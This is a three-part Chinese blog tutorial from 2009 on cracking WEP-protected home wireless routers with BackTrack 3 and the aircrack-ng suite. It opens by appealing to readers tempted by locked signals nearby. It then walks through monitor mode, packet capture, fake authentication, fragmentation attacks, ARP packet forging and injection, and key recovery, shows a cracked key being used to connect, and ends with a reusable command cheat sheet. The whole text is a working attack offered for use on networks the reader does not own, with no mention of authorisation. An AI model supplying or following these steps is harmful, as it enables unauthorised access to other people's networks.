透视高手 覆手:无线路由解码

查看文章
破解无线路由———上篇
2009年11月22日 下午 02:30
又是一个周末
最近降温，小c好像要感冒了，正好闲下来把该发表的都发表了！
今天讲的是无线路由密码的破解
蓝牙的普及，3G的普及等等，昭示着这个时代正在像无线连接这一方向发展
而相对于这些普及型的产品
wifi似乎只有在大城市才提供免费接入，普通的家庭用无线路由一般都是设置密码
随着笔记本用户的增多，相信无线路由终将替代有线宽带
同志们搜到无线信号而其又设置密码
是不是心痒痒的啊
呵呵
今天，小c就带你一起破解无线路由
关于无线破解，这里大家要有个认知，那就是在windows系统下是不可能实现破解目的的
这里要用到一个系统
那就是BT3(可以说是封装好的linux) 相信有点黑客知识的都会了解bt3
可以说世界上大多数黑客都是用它来破解各种东西的
首先大家要准备个U盘（大于1G)
下面就是下载 U盘版bt3http://cesium.di.uminho.pt/pub/backtrack/bt3final_usb.iso
这里要涉及bt3U盘版的制作
大家将下载来的镜像文件解压缩到U盘的根目录（注意一定是根目录）
会得到两个文件夹 boot 和 BT3

点开boot文件夹 找bootinst这个批处理文件

双点开始制作U盘启动bt3
按任意键开始制作

然后重启设置usb启动
选择你的U盘启动
下面就是选择进入bt3的方式
一般的是 BT3 Graphics mode (VESA KDE)
由于小c的是宽屏的本本 所以选择 TEXT ......(什么什么忘记了，大家可以来回试几次)
选择完后就开始加载驱动之类的了
等一下
会出来命令行状态
这里输入 root 回车
然后要求输入密码 输入 toor 回车
然后输入startx 回车
就进入bt3了
下面就要开始正式破解了
…

图02-进入后界面
然后点右下角的一个黑黑的显示器一样的图标打开一个控制台，如图03：

图03-打开控制台
这时候可以开始输入命令了。
① ifconfig -a
这是查看当前网卡信息的，-a是显示全部网卡，如果没有这个参数，就无法显示出无线网卡。这条命令可以查看当前网卡的MAC地址，其中，无线网卡的MAC地址是我们需要的，就在HWaddr后面的6个16进制字符，后面的那么多00是不要的，应该是为了IP6做准备的。如图04。

图04-查看网卡信息
可以看到，现在的无线网卡名称是wlan0，这是BT3自动加载的iwl3945驱动起的名字，而这个驱动是不支持之后的破解工作的，所以我们需要换个驱动。
② modprobe -r iwl3945
卸载当前iwl3945驱动。
③ modprobe ipwraw
加载ipwraw驱动，这个驱动是可以正常使用的。
加载之后再输入ifconfig –a试试，就会发现wlan0不见了，出来了个wifi0，如图05，这就是ipwraw给我们的网卡起的名字。这个名字之后会多次用到。这时候也需要把自己的MAC地址记住，最好是在桌面新建一个文本文件，然后复制进去，方便之后的命令调用。

图05-加载3945驱动
④ airmon-ng start wifi0
这条命令是设置无线网卡为监听模式，因为Windows下这个很难实现，而Linux由于开源，所以大部分黑客软件都是Linux平台下的，我刚开始用BT3的时候就因为iwl3945驱动不能使用监听模式而卡在这里了。设置成功后，如图06。
图06-设置监听模式
⑤ airodump-ng wifi0
既然要破解，那么总得有目标吧，这条命令就是检测当前所能搜索到的所有无线网络信号。其中包括频道，信号强度等信息。运行后如图07。

图07-查看存在AP
里面的几个参数，解释一下，网上也有解释的，但是解释得不太清楚。
BSSID——这个就是路由器的MAC地址了，我要破解的是下面那个，上面那个信号太差。
PWR——这个是信号强度，但是我的电脑显示不出来，显示不出来也没关系，不妨碍之后的破解的，只要在Windows中显示信号很好就可以了。
Beacons——这个是路由器对外发包，可能是SSID广播，我也不太清楚，如果看到这个数据在涨，就代表这个AP还行，一般是1秒涨20~30吧。太慢了就有可能因为信号的原因破解失败。
#Data——这个数据最最重要，这个代表可以用于破解的包，一般这个数据到达1W+，一般的64位的WEP密码就能够破解了。之后我们要做的，就是等待他到达1W，如果数据增长很缓慢（几分钟才增加1），那就只好用另一种方法了，就是发包攻击，这个在后面有介绍。
#/s——DATA增加的速度。
CH——频道，总共有11个频道，可以看到，我要破解的AP的频道是11。
MB——无线的速度，现在一般都是54MB的了。
CIPHER——加密方式，如果是WEP，就能够用这样的方式破解，如果是WPA/WPA2，目前就只能暴力破解了，话说我现在还不知道怎么暴力破解…等你破解出来的密码都是12345，1234567890之类的密码时，你就会觉得自己付出的和得到的完全不成比例…TAT。在这里我们只考虑WEP加密的情况。
AUTH——这个应该是authorization的缩写，也就是授权的意思，我也不明白这个有什么用。可能路由器要给客户端发包，就需要验证客户端权限。现在这里是空的，之后会有值的。
ESSID——简单理解，这个就是路由器的名字了。
这一步，我们要做的就是确定需要破解的路由器和它的MAC地址，DATA值增长速度比较快，或者在Windows下信号比较好，或者PWR比较高的，优先。同样，可以把MAC地址写到文本文件中去。
⑥ airodump-ng --ivs -w god -c 11 wifi0
这个命令是检测某个频道的路由器发包，并且保存可用包(也就是#DATA)到一个文件god，这个god是可以改成你喜欢的名字的，但是自己要记住…
参数中，
-c是指频道，后面跟着我要破解的路由器的信号频道，也就是11。
wifi0是我的网卡名称。
输入完这个命令后，这个窗口就不用关了，它要一直抓包的，我们称之为1号窗口。
下一篇
我们再继续讲无线路由的破解
查看文章
破解无线路由———中篇
2009年11月22日 下午 03:24
这时候我们重新打开一个控制台，也就是黑框框。输入之后的命令：
⑦ aireplay-ng -1 0 -a 00:23:CD:89:**:** -h 00-1F-3C-5B-**-** wifi0
-a后面跟着的是目标MAC地址。
-h后面跟着的是本机的无线网卡MAC地址。
wifi0是本机无线网卡名称
这条命令是获取授权，测试模拟发包攻击，具体有什么用，我不太清楚… 可能是测试能否通过发包进行攻击吧。
成功后会出现如下信息：Association successful :-)
然后上面那个窗口中AUTH栏值变成OPN。

图08-测试连接
⑧ aireplay-ng -5 -b 00:23:CD:89:**:** -h 00-1F-3C-5B-**-** wifi0
参数中
-5是aireplay这个程序使用的模式，无需深究。
-b后面跟着的是目标MAC地址。
-h后面跟着的是本机的无线网卡MAC地址。
wifi0是本机无线网卡名称
这个命令，我的理解是是获取到一个特定的包制作攻击源，然后可以用这个攻击源进行发包攻击。这一步是最难成功的，往往失败就是因为这一步。如果你选择的AP等了半天DATA值还是0，可以放弃那个了。输入命令后，就开始抓包了，下面的数据会涨，如图09，等抓到一个有用的包的时候，它会问你是否用这个包，如图10，按Y，然后回车就OK。
但是往往获取到的包都是攻击失败的，如图11，这样就只好继续等了，它会自动开始下一轮抓包的，所以，破解也是需要RP的…RP低的兄弟姐妹还是飘走吧……

图09-获取可用包

图10-获取到可用包

图11-攻击失败
再说说DATA值为什么会保持在0或者增长缓慢。如果这个AP是有客户端无线连接的，那么它发的数据就多，获取到可用包的几率就大。如果没客户端连接，它做的工作就是不断向外发送SSID广播，简单说就是告诉大家，我是一个路由器，我的名字是****，我的信号有多大，我有没有密码等等。这样的包，可用来破解密码的（也就是DATA包）是凤毛麟角啊，一般5000个包能出一个都算不错了…
在等待的过程中，可以打开另一个窗口，输入第9条命令
⑨ aircrack-ng -b 00:23:CD:89:**:** god-01.ivs
参数中
-b后面跟着的是目标MAC地址。
这个就是正式破解了，其中god-01.ivs是我们抓的数据包，也就是DATA包保存成的文件，如果你多次使用airodump抓包，那么你可以去root目录看看最新生成的文件名，然后相应变更。这个程序就用这些抓到的DATA包来计算出密码。运行命令后如图12。

图12-尝试破解失败
可以看到破解失败了。只有34个IVs（DATA包），不失败才怪呢，之前说过一般要1W+才可以的。
第2个窗口中，等啊等，终于等到一个有用的包了，成功信息如图13

图13-获取到可用于攻击的包
成功后程序会生成一个xor文件fragment-0806-150830.xor，记住这个就好，下一条命令要用。
接着输入：
⑩ packetforge-ng -0 -a 00:23:CD:89:**:** -h 00-1F-3C-5B-**-** -k 255.255.255.255 –l 255.255.255.255 -y fragment-0806-150830.xor -w moon
参数中
-a后面跟着的是目标MAC地址。
-h后面跟着本地无线网卡MAC地址。
-y是上一步中生成的那个xor文件
-w是生成的ARP包文件名，我填了moon，可更改，也要记住。
这个命令是伪造ARP包，用于ARP攻击。
最后一条命令，就让路由器做临死前的挣扎吧…
查看文章
破解无线路由———下篇
2009年11月22日 下午 03:25
aireplay-ng -2 -r moon -x 512 wifi0
moon是上一步保存的ARP包文件名。
512是攻击线程，一般512够了，1024我怕大了，没敢弄。
wifi0是网卡名称。
输入完这一条，就可以看到第1个窗口中的DATA值暴增，如图14。

图14-发包攻击
图上可以看到，DATA的增长速度是361个/s。
然后我们就切换到第3个窗口，就是aircrack那个窗口看看吧，等DATA到了5000，就会自动开始 破解，如果没成功，DATA到达10000又会破解一次。这一切都发生地很迅速。
很快，密码出来了，如图15。

图15-破解成功
从图15可以看到，密码就是8264287788。由于WEP中64位加密是5个ASCII码或者10个16进制字符，所以，我们可以切换Windows，然后用8264287788连接上去，如图16，信号很好哦！

图16-无线连接
【总结】
把所有用到的命令都总结一下，[]内的是需要更改的，方便大家对照修改。
① ifconfig –a
② modprobe -r iwl3945
③ modprobe ipwraw
④ airomon-ng start [网卡名]
⑤ airodump-ng [网卡名]
⑥ airodump-ng --ivs -w [DATA包文件名] -c [频道] [网卡名]
⑦ aireplay-ng -1 0 -a [目标MAC] -h [网卡MAC] [网卡名]
⑧ aireplay-ng -5 -b [目标MAC] -h [网卡MAC] [网卡名]
⑨ aircrack-ng -b [目标MAC] [DATA包文件名]-0*.ivs
⑩ packetforge-ng -0 -a [目标MAC] -h [网卡MAC] -k 255.255.255.255 –l 255.255.255.255 -y [上一步的xor文件名] -w [攻击包文件名]
aireplay-ng -2 -r [攻击包文件名] -x [攻击线程] [网卡名]
在小c做的教程中:
[网卡名] ——wifi0
[DATA包文件名]——god
[频道]——11
[目标MAC]——00:23:CD:89:**:**
[网卡MAC]——00-1F-3C-5B-**-**
[上一步的xor文件名]——fragment-0806-150830.xor
[攻击包文件名]——moon
[攻击线程]——512